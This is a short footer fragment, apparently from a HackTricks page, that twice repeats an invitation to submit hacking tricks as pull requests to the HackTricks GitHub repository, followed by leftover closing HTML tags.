**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>